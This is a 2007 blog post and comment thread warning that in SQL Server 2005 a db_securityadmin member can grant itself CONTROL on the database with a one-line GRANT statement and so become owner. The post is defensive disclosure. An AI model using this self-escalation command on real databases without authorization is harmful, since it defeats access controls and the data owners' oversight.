SQL, Analysis Services & related stories.

db_securityadmin is very powerfull and … dangerous.

Few days ago I worked for one client. He uses the following business model:

-          dbo usually responsible for high level database design and maintenance;

-          all database users organized in additional security groups for security purposes;

-          dedicated person is responsible for user’s security maintenance, (s)he is able to assign user to explicit (one or more) application security group. This dedicated person is a department’s secretary, (s)he is trusted person, has only right to run simple SELECT statement on some tables, but (s)he is member of db_securityadmin database role.

 

Firstly it seems to me that security rules are appropriate and nothing can happen. Secretary is unable to maintain built-in database roles like db_datawriter etc.

 

Please login under account – member of db_securityadmin to check

 

SELECT * FROM fn_my_permissions(N'db_name', N'DATABASE')

you will get the following list of privileges (according to BOL).

 

--  ALTER ANY APPLICATION ROLE
--  ALTER ANY ROLE
--  CREATE SCHEMA
--  VIEW DEFINITION

 

But if you run

 

GRANT CONTROL TO <secretary> -- grant database control to self

 

and try to run

 

SELECT * FROM fn_my_permissions(N'db_name', N'DATABASE')

after that to ensure <secretary> now become dbo!

 

Please be careful to use odd database security groups. Also only trusted person should be assigned to this group. As for now (SQL Server 2005 member of db_securityadmin) equal to database owner.

Next article I will show you potential problems in more details.

Published Monday, January 15, 2007 1:58 AM by Igor Kovalenko

Comment Notification

If you would like to receive an email when updates are made to this post, please register here

Subscribe to this post's comments using RSS

Comments

 

Vladimir said:

When we should expect this to be fixed...?

March 26, 2007 8:43 PM
 

Igor Kovalenko said:

I don't think this will be fixed soon (or at all). Security team responded that a member of "db_securityadmin" should be a trusted person.

March 27, 2007 1:55 AM
 

Vladimir said:

They should try to "sell" it to business users, who will be concern about security of data...

That's not the answer, they have to admit this is security issue and it needs to be fixed...

Nobody should be able to elevate own privileges, otherwise it doesn't make sense, to have security based only on trustiness..

What could happen, if this account will be compromised and someone will be aware about this possibility of self elevating privileges..?

I'm kind of positive they may fix it silently during next service packs or fixes..

March 27, 2007 2:26 PM
 

SQL Server tools said:

Well, I'm not selling any tool to fix any issues or threats you have alread in your SQL Server environment.

March 28, 2007 4:47 AM

Leave a Comment

(required) 
(optional)
(required) 

  
Enter Code Here: Required
Submit

About Igor Kovalenko

I've been in IT since 1991 starting my carrier on Unix & C development. Now i am a consultant in Microsoft Services, Russia. My areas of experience - SQL & OLAP. I've been working with Microsoft tools for more than 15 years, started from asm 5.0 and Quick C 2.51 through (Visual) FoxPro, VB, C#... But my mission is SQL. Truly says i have enough knowledge both Oracle (8, 9.i) and Microsoft db technology, but it's to hard for me to cover both :-). My real data warehousing experience started with one of the largest DW implementation with using Oracle 9i in Russia till 2002. Of course i also implemented the first part of BI project on top of this DW with using SQL AS 2000 & Crystal reports. After that for a year i was a seniour developer, Online Services, in Dell UK, Bracknell (c++/vb/Oracle/SQL/ASP). In 2003 i was a little bit tired from High Technology World and decided to join Deloitte, Moscow, where i was a Finance analyst, member of Business Director Group. I really miss a half of my IT knowledge this time (SQL & Crystal is only useful), but now i perfectly know the "underground" of any BIG 4 consulting company, budgeting and managing process details, FTE, Utilization, OPTS analysis.... Hell, real accounting hell. I was excited to design and implement my first (and last) project with using Cognos EP tool. At the end of 2005 i was hired by my favorite company :-) Microsoft and now i am working with my favorite tool: SQL Server. To keep a long story short :-).

This Blog

Syndication

News

Locations of visitors to this page

© 2009 Microsoft Corporation. All rights reserved. Terms of Use  |  Trademarks  |  Privacy Statement
Microsoft
Page view tracker